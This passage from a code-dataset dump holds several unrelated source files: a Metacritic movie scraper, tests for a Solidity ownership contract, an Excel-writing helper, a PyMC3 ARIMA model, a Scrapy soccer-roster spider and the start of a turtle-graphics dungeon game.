extract_year_from_url.findall(url)[0]\n\ndef get_links_for_all_movies_by_year(year):\n '''gets the links to all movies in a given year'''\n\n params = {'year_selected':year, 'sort':'desc'}\n\n num_pages = get_number_of_pages(f'{all_movies_by_year}/filtered?year_selected={year}')\n\n if num_pages == '0':\n return [f'{all_movies_by_year}/filtered?year_selected={year}&sort=desc&page={0}']\n else:\n links = [f'{all_movies_by_year}/filtered?year_selected={year}&sort=desc&page={i}' for i in range(0,int(num_pages))]\n\n return links\n\ndef get_links_to_all_movies_on_page(page_url):\n '''takes the url of a to a page with movies as input, returns a list of with urls to all the movies that appear in the page'''\n try:\n page = requests.get(page_url,headers=header)\n except ConnectionError:\n print('Connection error, trying again in 10')\n time.sleep(10)\n return get_links_to_all_movies_on_page(page_url)\n\n except Exception as e:\n logging.error(e)\n\n\n soup = BeautifulSoup(page.content,features=\"html.parser\")\n\n movie_tags = soup.select('span.title.numbered + a.title')\n movie_links = [link.attrs['href'] for link in movie_tags]\n movie_links = [f'https://www.metacritic.com/movie{link}' for link in movie_links]\n\n return movie_links\n\n\n\ndef get_link_for_all_movies_in_single_year(task_queue, write_queue):\n '''takes a list of urls as input, find all the movies in those urls and puts that result (a dict) on queue'''\n tmp_dict = {}\n\n while not task_queue.empty():\n url = task_queue.get()\n year = get_year(url[0])\n\n for link in url:\n\n\n print(f' ({year}) Getting url {link}')\n time.sleep(random.uniform(0.5,1))\n\n completed = False\n\n while not completed:\n try:\n page = requests.get(link,headers=header)\n soup = BeautifulSoup(page.content, features=\"html.parser\")\n movie_titles = [title.text for title in soup.select('span.title.numbered + a h3')]\n movie_tags = soup.select('span.title.numbered + a.title')\n movie_links = [link.attrs['href'] for link in movie_tags]\n movie_name_and_link = {name: f'https://www.metacritic.com{link}' for name, link in\n zip(movie_titles, movie_links)}\n tmp_dict.update({year:movie_name_and_link})\n time.sleep(random.uniform(1, 2))\n completed = True\n\n except ConnectionError:\n print('Connection error, retrying in 10 seconds')\n time.sleep(10)\n\n except Exception as e:\n logging.error(f'Was unable to download {link}, ({e})')\n break\n task_queue.task_done()\n\n write_queue.put(tmp_dict)\n tmp_dict = {}\n\n print(f'{threading.currentThread().name}: Stopping due to empty queue')\n\ndef make_dict_of_links_to_all_movies_by_year(num_workers):\n '''Use workers to get all the movies and save it to a dict that links the movie name to the url to that movie'''\n task_queue = Queue()\n write_queue = Queue()\n write_queue.downloads_complete = False\n\n # get all the links to all the movies\n with open('links_for_all_movies_by_year.txt', 'r') as file:\n content = file.read()\n content = content.split('\\n')\n\n # put urls for all the different pages in all years into the task queue\n unique_years = list(set([get_year(link) for link in content]))\n for year in unique_years:\n task_queue.put([item for item in content if get_year(item) == year])\n\n\n # make a writer queue thread\n writer_thread = Thread(target=write_dict_of_links_to_file,args=[write_queue])\n writer_thread.start()\n # iterate over each link\n for i in range(num_workers):\n workers = [threading.Thread(name=str(i),target=get_link_for_all_movies_in_single_year,args=[task_queue,write_queue]) for i in range(num_workers)]\n for w in workers:\n w.start()\n for w in workers:\n w.join()\n\n write_queue.downloads_complete = True\n\ndef write_dict_of_links_to_file(queue):\n '''Takes a queue as input and continuelesly updates the .json files'''\n FILENAME = 'all_movies_with_titles_and_links_by_year.json'\n\n\n if not os.path.isfile(FILENAME):\n with open(FILENAME,'w+') as file:\n pass\n\n while True and not queue.downloads_complete:\n if queue.empty():\n time.sleep(0.5)\n else:\n output = queue.get()\n with open(FILENAME, 'r+') as file:\n content = file.read()\n if content == '':\n json_dict = output\n file.write(json.dumps(json_dict))\n else:\n try:\n json_dict = json.loads(content)\n json_dict.update(output)\n with open(FILENAME, 'w+') as file2:\n print(f'Updated dict with {output}')\n file2.write(json.dumps(json_dict))\n\n except json.JSONDecodeError as e:\n print(e)\n\n print('Stopping writer queue thread')\n\n\n\n\ndef get_link_of_failed_download(task_queue,write_queue):\n\n while not task_queue.empty():\n time.sleep(random.uniform(0.5,1))\n failed_url = task_queue.get()\n print(f'Trying to fix {failed_url}')\n try:\n page = requests.get(failed_url, headers=header, allow_redirects=True)\n print(f'{failed_url} :: {page.status_code}')\n\n # check if the page was moved\n if 301 in [item.status_code for item in page.history]:\n print(f'{failed_url} has moved')\n real_url = page.url.split('movie_title=')[-1]\n real_url = f'https://www.metacritic.com/movie/{real_url}'\n time.sleep(random.uniform(0.5, 1))\n real_page = requests.get(real_url, headers=header, allow_redirects=True)\n if real_page.status_code == 200:\n soup = BeautifulSoup(real_page.content, features=\"html.parser\")\n product_title = soup.select('.product_page_title h1')[0].text.strip()\n year = soup.select('h1 + .release_year')[0].text.strip()\n\n # send the answer to the write queue\n write_queue.put( (year,product_title,real_page.url) )\n print(f'Fix {product_title}s url to {real_page.url}')\n\n else:\n print(f'Failed to get {real_url} ({real_page.status_code})')\n\n else:\n print(f'{failed_url} has not moved {page.status_code}')\n\n\n except Exception as e:\n print(f'Could not access {failed_url}: {e}')\n\n print('Stopping due to empty task queue')\n\ndef write_fixed_links(task_queue,write_queue):\n\n\n while task_queue.done is False:\n\n while not write_queue.empty():\n year,product_title,fixed_link = write_queue.get()\n\n # open up the json links file and read into memory\n with open('all_movies_with_titles_and_links_by_year.json', 'r') as jsonfile:\n all_movies_dict = json.loads(jsonfile.read())\n all_movies_dict[year][product_title] = fixed_link\n\n # overwrite the file\n with open('all_movies_with_titles_and_links_by_year.json', 'w') as jsonfile:\n jsonfile.write(json.dumps(all_movies_dict))\n\n print('No fixed urls to write, sleeping for 5 secs')\n time.sleep(5)\n\n print('All tasks done, shutting down write queue')\n\n\ndef get_real_links_of_failed_downloads(num_workers):\n\n write_queue = Queue()\n task_queue = Queue()\n task_queue.done = False\n\n # all the tasks to the task queue\n with open('failed_raw_downloads.txt','r') as file:\n for line in file:\n link,error = line.split(',')\n task_queue.put(link)\n\n # start the workers\n workers = []\n for i in range(num_workers):\n workers.append(threading.Thread(target=get_link_of_failed_download,args=[task_queue,write_queue]))\n\n for w in workers:\n w.start()\n for w in workers:\n w.join()\n\n\n print('All workers finished their jobs')\n task_queue.done = True\n\n\nif __name__ == '__main__':\n\n get_real_links_of_failed_downloads(5)\n\n #make_dict_of_links_to_all_movies_by_year(num_workers=20)\n","sub_path":"get_links_for_all_movies.py","file_name":"get_links_for_all_movies.py","file_ext":"py","file_size_in_byte":9253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"323549739","text":"import unittest\n\nfrom utils.deployutils import compile_contracts, attempt_deploy, mine_tx, MASTER, DUMMY\nfrom utils.deployutils import take_snapshot, restore_snapshot\nfrom utils.testutils import assertReverts, ZERO_ADDRESS\nfrom utils.testutils import generate_topic_event_map, get_event_data_from_log\n\nOWNED_SOURCE = \"contracts/Owned.sol\"\n\n\ndef setUpModule():\n print(\"Testing Owned...\")\n\n\ndef tearDownModule():\n print()\n\n\nclass TestOwned(unittest.TestCase):\n def setUp(self):\n self.snapshot = take_snapshot()\n\n def tearDown(self):\n restore_snapshot(self.snapshot)\n\n @classmethod\n def setUpClass(cls):\n cls.assertReverts = assertReverts\n\n compiled = compile_contracts([OWNED_SOURCE])\n cls.owned, txr = attempt_deploy(compiled, 'Owned', MASTER, [MASTER])\n\n cls.owner = lambda self: cls.owned.functions.owner().call()\n cls.nominatedOwner = lambda self: cls.owned.functions.nominatedOwner().call()\n cls.nominateOwner = lambda self, sender, newOwner: mine_tx(\n cls.owned.functions.nominateOwner(newOwner).transact({'from': sender}))\n cls.acceptOwnership = lambda self, sender: mine_tx(\n cls.owned.functions.acceptOwnership().transact({'from': sender}))\n\n cls.owned_event_map = generate_topic_event_map(compiled['Owned']['abi'])\n\n def test_owner_is_master(self):\n self.assertEqual(self.owner(), MASTER)\n\n def test_change_owner(self):\n old_owner = self.owner()\n new_owner = DUMMY\n\n self.assertReverts(self.nominateOwner, new_owner, old_owner)\n nominated_tx = self.nominateOwner(old_owner, new_owner)\n event_data = get_event_data_from_log(self.owned_event_map, nominated_tx.logs[0])\n self.assertEqual(event_data['event'], \"OwnerNominated\")\n self.assertEqual(event_data['args']['newOwner'], new_owner)\n\n self.assertEqual(self.owner(), old_owner)\n self.assertEqual(self.nominatedOwner(), new_owner)\n self.assertReverts(self.nominateOwner, new_owner, old_owner)\n accepted_tx = self.acceptOwnership(new_owner)\n event_data = get_event_data_from_log(self.owned_event_map, accepted_tx.logs[0])\n self.assertEqual(event_data['event'], \"OwnerChanged\")\n self.assertEqual(event_data['args']['oldOwner'], old_owner)\n self.assertEqual(event_data['args']['newOwner'], new_owner)\n\n self.assertEqual(self.nominatedOwner(), ZERO_ADDRESS)\n self.assertEqual(self.owner(), new_owner)\n self.assertReverts(self.nominateOwner, old_owner, new_owner)\n\n self.nominateOwner(new_owner, old_owner)\n self.acceptOwnership(old_owner)\n self.assertEqual(self.owner(), old_owner)\n\n def test_change_invalid_owner(self):\n invalid_account = DUMMY\n self.assertReverts(self.nominateOwner, invalid_account, invalid_account)\n\n def test_undo_change_owner(self):\n old_owner = self.owner()\n new_owner = DUMMY\n\n self.assertReverts(self.nominateOwner, new_owner, old_owner)\n self.nominateOwner(old_owner, new_owner)\n self.nominateOwner(old_owner, ZERO_ADDRESS)\n self.assertReverts(self.acceptOwnership, new_owner)\n","sub_path":"tests/test_Owned.py","file_name":"test_Owned.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"433359679","text":"#encoding: utf-8\nimport xlrd\nimport xlwt\nimport xlutils.copy\n\ndef _getOutCell(outSheet, colIndex, rowIndex):\n \"\"\" HACK: Extract the internal xlwt cell representation. \"\"\"\n row = outSheet._Worksheet__rows.get(rowIndex)\n if not row: return None\n\n cell = row._Row__cells.get(colIndex)\n return cell\n\ndef setOutCell(outSheet, col, row, value):\n \"\"\" Change cell value without changing formatting. \"\"\"\n # HACK to retain cell style.\n previousCell = _getOutCell(outSheet, col, row)\n # END HACK, PART I\n\n outSheet.write(row, col, value)\n\n # HACK, PART II\n if previousCell:\n newCell = _getOutCell(outSheet, col, row)\n if newCell:\n newCell.xf_idx = previousCell.xf_idx\n # END HACK\n\ndef simple_excel(data, infile, outfile):\n\n data = [ [unicode(val, 'utf-8') if isinstance(val, basestring) else val for val in row] for row in data]\n\n inbook = xlrd.open_workbook(infile, formatting_info=True)\n outbook = xlutils.copy.copy(inbook)\n\n outSheet = outbook.get_sheet(0)\n for row, sub_data in enumerate(data):\n for col, value in enumerate(sub_data):\n setOutCell(outSheet, col, row, value)\n\n outbook.save(outfile)\n\ndef multi_sheet(infos, infile, outfile):\n\n inbook = xlrd.open_workbook(infile, formatting_info=True)\n outbook = xlutils.copy.copy(inbook)\n\n\n for id, info in enumerate(infos):\n info['data'] = [ [unicode(val, 'utf-8') if isinstance(val, basestring) else val for val in row] for row in info['data']]\n outSheet = outbook.get_sheet(id)\n for row, sub_data in enumerate(info['data']):\n for col, value in enumerate(sub_data):\n setOutCell(outSheet, col, row, value)\n\n outbook.save(outfile)\n'''\ndef multi_sheet(infos, filename):\n book = xlwt.Workbook()\n\n for info in infos:\n sheet = book.add_sheet(info['sheetname'])\n\n info['data'] = [ [unicode(val, 'utf-8') if isinstance(val, basestring) else val for val in row] for row in info['data']]\n\n for row, sub_data in enumerate(info['data']):\n for col, value in enumerate(sub_data):\n sheet.write(row, col, value)\n\n book.save(filename)\n'''\n\n","sub_path":"python/116_cronscript/lib/mkexcel2.py","file_name":"mkexcel2.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"55539931","text":"import pandas as pd\nimport pymc3 as pm\nfrom theano import scan, shared\nimport theano.tensor as tt\n\n\ndef build_model(X, treatment_start, treatment_observations):\n time_seen = pd.to_datetime(treatment_start) + pd.DateOffset(treatment_observations - 1)\n y = shared(X[:time_seen].values)\n y_switch = shared(X[:time_seen].index < treatment_start)\n with pm.Model() as i1ma1:\n σ = pm.HalfCauchy('σ', beta=2.)\n θ = pm.Normal('θ', 0., sd=2.)\n β = pm.Normal('β', 0., sd=2.)\n\n y_adj = tt.switch(y_switch, y, y - tt.dot(y, β))\n\n # ARIMA (0, 1, 1)\n # ---------------\n # (1 - B) y[t] = (1 - θB) ε[t]\n # y[t] - y[t-1] = ε[t] - θ * ε[t-1]\n # ε[t] = y[t] - y[t-1] - θ * ε[t-1]\n def calc_next(y_lag1, y_lag0, ε, θ):\n return y_lag0 - y_lag1 - θ * ε\n\n # Initial noise guess -- let's just seed with 0\n ε0 = tt.zeros_like(y_adj)\n\n ε, _ = scan(fn=calc_next,\n sequences=dict(input=y_adj, taps=[-1, 0]),\n outputs_info=[ε0],\n non_sequences=[θ])\n\n pm.Potential('like', pm.Normal.dist(0, sd=σ).logp(ε))\n return i1ma1\n","sub_path":"utils/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"522401192","text":"# -*- coding: utf-8 -*-\r\n\r\nimport scrapy\r\nimport sys\r\nimport re\r\nsys.path.append('..')\r\nfrom items import Player\r\nfrom soccerspider import SoccerSpider\r\nfrom CurrentRosterYear import get_current_roster_year\r\nfrom LeagueDictionary import get_college_from_url, check_league\r\nfrom TableSpider import TableSpider\r\n\r\nclass NewRosterDataTableDukeSpider(scrapy.Spider):\r\n\r\n \"\"\"\r\n Spider for websites formatted like Duke's and Holy Cross's page. Only for current roster year\r\n \"\"\"\r\n name = 'newRosterDataTableDukeSpider'\r\n\r\n current_roster_year = get_current_roster_year() #i.e 2018-2019\r\n\r\n custom_settings = {\r\n\r\n 'ITEM_PIPELINES':{\r\n 'SoccerScrape.pipelines.IncomingPlayerPipeline': 300,\r\n }\r\n }\r\n\r\n start_urls = [\r\n 'http://www.goduke.com/SportSelect.dbml?SPID=1833&SPSID=22446&DB_OEM_ID=4200',\r\n 'https://goholycross.com/SportSelect.dbml?DB_OEM_ID=33100&SPID=174208&SPSID=1020214'\r\n ]\r\n\r\n allowed_domains = [\r\n 'www.goduke.com',\r\n 'goholycross.com'\r\n ]\r\n\r\n INDEX = { #maps the school to where the attributes are in the HTMl tags\r\n 'www.goduke' :{'NUMBER': 1 ,'PLAYER_POSITION': 3, 'ACADEMIC_YEAR': 6, 'HEIGHT': 4, 'WEIGHT': 5 ,'LOCATION': 7},\r\n 'goholycross' :{'NUMBER': 1 ,'PLAYER_POSITION': 3, 'ACADEMIC_YEAR': 6, 'HEIGHT': 4, 'WEIGHT': 5 , 'LOCATION': 7}\r\n }\r\n\r\n def start_requests(self):\r\n \"\"\"\r\n Starts the http request\r\n \"\"\"\r\n for u in self.start_urls:\r\n try:\r\n yield scrapy.Request(u, callback=self.parse_list,\r\n errback=SoccerSpider.errback_httpbin, dont_filter=True)\r\n except ValueError:\r\n print(\"ValueError\")\r\n continue\r\n\r\n\r\n def parse_list(self, response):\r\n \"\"\"\r\n parses data in a table format similar to American University's\r\n \"\"\"\r\n self.logger.debug('Got successful response from {}'.format(response.url))\r\n players_table_view = '//*[@id=\"roster-list-table\"]/tbody/tr'\r\n players = response.xpath(players_table_view)\r\n school_url = response.url[response.url.index('/')+2:response.url.index('.com')] #domain for school\r\n\r\n roster_year = (response.xpath('//*[@id=\"roster-page\"]/h1/text()')\r\n .extract_first()\r\n .split(' ')[-2]\r\n .split('-')[1]\r\n .strip())\r\n\r\n for player in players:\r\n #extracting data from table\r\n playerItem = Player()\r\n player_name = player.xpath(\".//td[2]/a/text()\").extract_first().strip().split() #array [fn, ln]\r\n\r\n if(len(player_name) == 0):\r\n continue #skipping header row\r\n\r\n player_first_name = player_name[0].strip()\r\n player_last_name = \" \".join(player_name[1:]).strip()\r\n\r\n player_position = player.xpath('.//td['+ self.reference_index(school_url, 'PLAYER_POSITION') + ']/text()').extract_first().strip() #'position'\r\n\r\n player_class_year = player.xpath('.//td['+ self.reference_index(school_url, 'ACADEMIC_YEAR') + ']/text()').extract()[1].strip()\r\n\r\n player_height = player.xpath('.//td['+ self.reference_index(school_url, 'HEIGHT') + ']/text()').extract() #array['feet-inches']\r\n\r\n number = player.xpath('.//td[' + self.reference_index(school_url, 'NUMBER') + ']/text()').extract_first().strip()\r\n\r\n weight = player.xpath('.//td[' + self.reference_index(school_url, 'WEIGHT') + ']/text()').extract_first().strip()\r\n\r\n if(len(player_height) == 0):\r\n player_height = 'NA'\r\n else:\r\n player_height = player_height[0].strip()\r\n\r\n player_location = player.xpath('.//td['+ self.reference_index(school_url, 'LOCATION') + ']/text()').extract_first().strip()\r\n\r\n #Item Processing\r\n playerItem['previousSchool'] = 'NA'\r\n self.process_player_location(playerItem, player_location)\r\n playerItem['rosterYear'] = roster_year\r\n playerItem['college'] = get_college_from_url(urlDomain=response.url[response.url.index('/')\r\n + 2:response.url.index('.com')+4])\r\n\r\n playerItem['collegeLeague'] = check_league(urlDomain=response.url[response.url.index('/')\r\n + 2:response.url.index('.com')+4])\r\n\r\n SoccerSpider.process_other_attribute(playerItem, player_first_name, 'firstName')\r\n SoccerSpider.process_other_attribute(playerItem, player_last_name, 'lastName')\r\n SoccerSpider.process_other_attribute(playerItem, player_position, 'position')\r\n SoccerSpider.process_other_attribute(playerItem, player_class_year, 'classYear')\r\n TableSpider.process_other_attribute(playerItem, player_height, 'height')\r\n SoccerSpider.process_other_attribute(playerItem, number, 'number')\r\n SoccerSpider.process_other_attribute(playerItem, weight, 'weight')\r\n\r\n href = player.xpath('.//td[2]/a/@href').extract_first()\r\n link = response.url[0:response.url.index('.com')+4] + href\r\n\r\n playerItem['profileLink'] = link\r\n\r\n yield playerItem\r\n\r\n\r\n def process_player_location(self, playerItem, player_location):\r\n \"\"\"\r\n method process_player_location processes attributes regarding high school, hometown, and home state\r\n type player_location: string formatted\r\n \"\"\"\r\n if not player_location:\r\n playerItem['homeTown'] = 'NA'\r\n playerItem['state_or_country'] = 'NA'\r\n playerItem['highSchool'] = 'NA'\r\n return\r\n\r\n split_location = player_location.split('(')\r\n homeTown = split_location[0].strip().split(',') #['hometown', 'state']\r\n playerItem['homeTown'] = re.sub(' +', ' ', homeTown[0].strip())\r\n playerItem['state_or_country'] = re.sub(' +', ' ', homeTown[1].strip())\r\n playerItem['highSchool'] = 'NA'\r\n\r\n if len(split_location) > 1:\r\n highSchool = split_location[1].strip()\r\n playerItem['highSchool'] = re.sub('[)]', '', highSchool)\r\n\r\n @classmethod\r\n def reference_index(self, school_url, attribute):\r\n \"\"\" Method reference_index looks up the proper index value in tages for the data needed\"\"\"\r\n return str(NewRosterDataTableDukeSpider.INDEX[school_url][attribute])\r\n\r\n\r\n","sub_path":"scripts/SoccerScrape/spiders/NewRosterDataTableViewDukeSpider.py","file_name":"NewRosterDataTableViewDukeSpider.py","file_ext":"py","file_size_in_byte":6755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"617989488","text":"\r\nfrom enemy import*\r\nfrom info import*\r\nfrom images import images\r\nfrom keybinding import keybinding\r\nfrom maps import*\r\nfrom intro import*\r\nfrom item import*\r\nimport turtle\r\nimport math\r\nimport random\r\nimport time\r\nimport winsound\r\n\r\nfor image in images:\r\n turtle.register_shape(image)\r\n\r\n#intro screen\r\n#------------------------------\r\nintro()\r\n\r\n#main screen \r\n#------------------------------\r\n\r\nwn = turtle.Screen()\r\nwn.bgcolor(\"black\")\r\nwn.title(\"7 Dungeons Deep (7DD)\")\r\nwn.setup(1900,930)\r\nwn.bgpic(\".\\\\art\\\\background.gif\")\r\nwn.tracer(0)\r\n\r\nclass Player(turtle.Turtle):\r\n def __init__(self):\r\n turtle.Turtle.__init__(self)\r\n self.shape(\".\\\\art\\\\heroright.gif\")\r\n self.penup()\r\n self.speed()\r\n self.fd(0)\r\n self.right=1\r\n self.left=0\r\n self.up=0\r\n self.down=0\r\n\r\n def headright(self):\r\n\r\n if self.right==1:\r\n pass\r\n\r\n if self.down==1:\r\n self.rt(270)\r\n self.down=0\r\n self.right=1 \r\n \r\n if self.left==1:\r\n self.rt(180)\r\n self.left=0\r\n self.right=1\r\n\r\n if self.up==1:\r\n self.rt(90)\r\n self.up=0\r\n self.right=1\r\n\r\n self.shape(\".\\\\art\\\\heroright.gif\")\r\n missile.shape(\".\\\\art\\\\arrowright.gif\")\r\n missile.fire()\r\n\r\n\r\n def headdown(self):\r\n\r\n if self.down==1:\r\n pass\r\n\r\n if self.left==1:\r\n \r\n self.rt(270)\r\n self.left=0\r\n self.down=1\r\n\r\n\r\n if self.up==1:\r\n \r\n self.rt(180)\r\n self.up=0\r\n self.down=1\r\n \r\n if self.right==1:\r\n \r\n self.rt(90)\r\n self.right=0\r\n self.down=1\r\n\r\n self.shape(\".\\\\art\\\\herodown.gif\")\r\n missile.shape(\".\\\\art\\\\arrowdown.gif\")\r\n missile.fire()\r\n\r\n def headleft(self):\r\n\r\n if self.left==1:\r\n pass\r\n\r\n if self.up==1:\r\n \r\n self.rt(270)\r\n self.up=0\r\n self.left=1\r\n\r\n if self.right==1:\r\n \r\n self.rt(180)\r\n self.right=0\r\n self.left=1\r\n\r\n if self.down==1:\r\n \r\n self.rt(90)\r\n self.down=0\r\n self.left=1\r\n\r\n self.shape(\".\\\\art\\\\heroleft.gif\")\r\n missile.shape(\".\\\\art\\\\arrowleft.gif\")\r\n missile.fire()\r\n \r\n def headup(self):\r\n \r\n if self.up==1:\r\n pass\r\n\r\n if self.right==1:\r\n \r\n self.rt(270)\r\n self.right=0\r\n self.up=1\r\n\r\n if self.down==1:\r\n \r\n self.rt(180)\r\n self.down=0\r\n self.up=1\r\n\r\n if self.left==1:\r\n \r\n self.rt(90)\r\n self.left=0\r\n self.up=1\r\n \r\n self.shape(\".\\\\art\\\\heroup.gif\")\r\n missile.shape(\".\\\\art\\\\arrowup.gif\")\r\n missile.fire()\r\n \r\n\r\n def go_up(self):\r\n\r\n if self.up==1:\r\n pass\r\n\r\n if self.right==1:\r\n \r\n self.rt(270)\r\n self.right=0\r\n self.up=1\r\n\r\n if self.down==1:\r\n \r\n self.rt(180)\r\n self.down=0\r\n self.up=1\r\n\r\n if self.left==1:\r\n \r\n self.rt(90)\r\n self.left=0\r\n self.up=1\r\n\r\n move_to_x = self.xcor()\r\n move_to_y = self.ycor()+24\r\n\r\n self.shape(\".\\\\art\\\\heroup.gif\")\r\n\r\n \r\n if (move_to_x, move_to_y) not in walls:\r\n self.goto(move_to_x, move_to_y)\r\n \r\n\r\n def go_down(self):\r\n\r\n if self.down==1:\r\n pass\r\n\r\n if self.left==1:\r\n \r\n self.rt(270)\r\n self.left=0\r\n self.down=1\r\n\r\n\r\n if self.up==1:\r\n \r\n self.rt(180)\r\n self.up=0\r\n self.down=1\r\n \r\n if self.right==1:\r\n \r\n self.rt(90)\r\n self.right=0\r\n self.down=1\r\n \r\n move_to_x = self.xcor()\r\n move_to_y = self.ycor()-24\r\n self.shape(\".\\\\art\\\\herodown.gif\")\r\n \r\n if (move_to_x, move_to_y) not in walls and npcs:\r\n self.goto(move_to_x, move_to_y)\r\n \r\n \r\n def go_left(self):\r\n\r\n if self.left==1:\r\n pass\r\n\r\n if self.up==1:\r\n \r\n self.rt(270)\r\n self.up=0\r\n self.left=1\r\n\r\n if self.right==1:\r\n \r\n self.rt(180)\r\n self.right=0\r\n self.left=1\r\n\r\n if self.down==1:\r\n \r\n self.rt(90)\r\n self.down=0\r\n self.left=1\r\n \r\n move_to_x = self.xcor()-24\r\n move_to_y = self.ycor()\r\n self.shape(\".\\\\art\\\\heroleft.gif\")\r\n \r\n if (move_to_x, move_to_y) not in walls :\r\n self.goto(move_to_x, move_to_y)\r\n \r\n def go_right(self):\r\n\r\n if self.right==1:\r\n pass\r\n\r\n if self.down==1:\r\n self.rt(270)\r\n self.down=0\r\n self.right=1 \r\n \r\n if self.left==1:\r\n self.rt(180)\r\n self.left=0\r\n self.right=1\r\n\r\n if self.up==1:\r\n self.rt(90)\r\n self.up=0\r\n self.right=1\r\n \r\n move_to_x = player.xcor()+24\r\n move_to_y = player.ycor()\r\n\r\n\r\n if (move_to_x, move_to_y) not in walls:\r\n self.goto(move_to_x, move_to_y)\r\n \r\n self.shape(\".\\\\art\\\\heroright.gif\")\r\n\r\n \r\n def drink(self):\r\n \r\n if info.potion>0 and info.hp is not info.fullhp : \r\n info.potion-=1\r\n info.show_healthpotion()\r\n\r\n if info.hp < info.fullhp-300:\r\n info.hp+=300\r\n info.show_health()\r\n else:\r\n info.hp=info.fullhp\r\n info.show_health()\r\n else:\r\n pass\r\n \r\n def fireball(self):\r\n if info.fire_scroll>0:\r\n info.fire_scroll-=1\r\n info.show_fire_scroll()\r\n missile2.fire()\r\n \r\n else:\r\n pass\r\n \r\n\r\n def is_collision(self,other):\r\n a = self.xcor()- other.xcor()\r\n b = self.ycor()- other.ycor()\r\n distance = math.sqrt ((a ** 2)+(b ** 2) )\r\n\r\n if distance < 10:\r\n return True\r\n else:\r\n return False\r\n\r\n def is_collision2(self,other):\r\n a = self.xcor()- other.xcor()\r\n b = self.ycor()- other.ycor()\r\n distance = math.sqrt ((a ** 2)+(b ** 2) )\r\n\r\n if distance < 50:\r\n return True\r\n else:\r\n return False\r\n\r\n def destroy(self):\r\n self.goto(500,500)\r\n self.hideturtle()\r\n\r\n\r\nclass Missile(turtle.Turtle):\r\n def __init__(self,startx, starty):\r\n turtle.Turtle.__init__(self)\r\n self.speed = 3\r\n self.fd(10)\r\n self.penup()\r\n self.color(\"yellow\")\r\n self.status = \"ready\"\r\n self.goto(-1000, 1000)\r\n\r\n def is_collision(self,other):\r\n a = self.xcor()- other.xcor()\r\n b = self.ycor()- other.ycor()\r\n distance = math.sqrt ((a ** 2)+(b ** 2) )\r\n\r\n if distance < 22: # LESS THAN 25 OR YOU ATTACK DIAGANAL \r\n return True\r\n else:\r\n return False\r\n\r\n def is_far(self,other):\r\n a = self.xcor()- other.xcor()\r\n b = self.ycor()- other.ycor()\r\n distance = math.sqrt ((a ** 2)+(b ** 2) )\r\n\r\n if distance >25:\r\n return True\r\n else:\r\n return False\r\n \r\n\r\n def fire(self):\r\n if self.status == \"ready\":\r\n self.goto(player.xcor(), player.ycor())\r\n self.setheading(player.heading())\r\n self.status = \"firing\"\r\n if lives != 3:\r\n winsound.PlaySound(\".\\\\sound\\\\swing.wav\", winsound.SND_ASYNC) \r\n \r\n def move(self):\r\n \r\n if self.status == \"ready\":\r\n self.goto(-2456, 3422)\r\n \r\n \r\n if self.status == \"firing\":\r\n self.fd(self.speed) \r\n \r\n #Border check\r\n\r\n\r\n if missile.is_far(player):\r\n self.setheading(player.heading())\r\n self.status = \"ready\" \r\n \r\n \r\n if self.xcor() < -400 or self.xcor() > 400 or \\\r\n self.ycor()< -400 or self.ycor()> 400:\r\n self.setheading(player.heading())\r\n self.status = \"ready\"\r\n\r\n if (self.xcor(), self.ycor()) in walls: \r\n self.setheading(player.heading())\r\n self.status = \"ready\"\r\n \r\nclass Missile2(turtle.Turtle):\r\n def __init__(self,startx, starty):\r\n turtle.Turtle.__init__(self)\r\n self.shape(\".\\\\art\\\\fire.gif\")\r\n self.speed = 3\r\n self.fd(10)\r\n self.damage=400\r\n self.penup()\r\n self.color(\"yellow\")\r\n self.status = \"ready\"\r\n self.goto(-1000, 1000)\r\n\r\n def is_collision(self,other):\r\n a = self.xcor()- other.xcor()\r\n b = self.ycor()- other.ycor()\r\n distance = math.sqrt ((a ** 2)+(b ** 2) )\r\n\r\n if distance < 30:\r\n return True\r\n else:\r\n return False\r\n\r\n def is_far(self,other):\r\n a = self.xcor()- other.xcor()\r\n b = self.ycor()- other.ycor()\r\n distance = math.sqrt ((a ** 2)+(b ** 2) )\r\n\r\n if distance >125:\r\n return True\r\n else:\r\n return False\r\n \r\n\r\n def fire(self):\r\n if self.status == \"ready\":\r\n self.goto(player.xcor(), player.ycor())\r\n self.setheading(player.heading())\r\n self.status = \"firing\"\r\n if lives != 3:\r\n winsound.PlaySound(\".\\\\sound\\\\fireball.wav\", winsound.SND_ASYNC)\r\n\r\n \r\n def move(self):\r\n \r\n if self.status == \"ready\":\r\n self.goto(-2456, 3422)\r\n \r\n \r\n if self.status == \"firing\":\r\n self.fd(self.speed) \r\n \r\n #Border check\r\n\r\n\r\n if missile2.is_far(player):\r\n self.setheading(player.heading())\r\n self.status = \"ready\" \r\n \r\n \r\n if self.xcor() < -400 or self.xcor() > 400 or \\\r\n self.ycor()< -400 or self.ycor()> 400:\r\n self.setheading(player.heading())\r\n self.status = \"ready\"\r\n\r\n if (self.xcor(), self.ycor()) in walls: \r\n self.setheading(player.heading())\r\n self.status = \"ready\"\r\n\r\n\r\nparticles = []\r\n\r\nfor i in range(15):\r\n particles.append(Particle(\"circle\", \"red\", 0, 0))\r\n \r\nmission=0\r\nlives=0\r\nquests2=[]\r\nquests=[]\r\nquest_items=[]\r\narmourupgrade=0\r\nweaponupgrade=0\r\ncrowns=[]\r\nenemies2 =[]\r\nenemies =[] \r\ncoins =[]\r\ndoors =[]\r\nhealings=[]\r\nfake_walls=[]\r\nnpcs=[]\r\nfirescrolls=[]\r\nswords=[]\r\narmours=[]\r\nwalls=[]\r\n\r\nlevels = [\"\"]\r\n\r\nlevels.append(level_1)\r\nlevels.append(level_2)\r\nlevels.append(level_3)\r\nlevels.append(level_4)\r\nlevels.append(level_5)\r\nlevels.append(level_6)\r\nlevels.append(level_7)\r\nlevels.append(level_8)\r\n\r\n#row are y ( up/down) column are x (left and right )\r\n# \r\n\r\ndef setup_maze(level):\r\n for y in range (len(level)): #tell how many rows there is \r\n for x in range(len(level[y])): # acquire every x of the y row\r\n #Get the character at each x,y coordinate\r\n #NOTE the order of 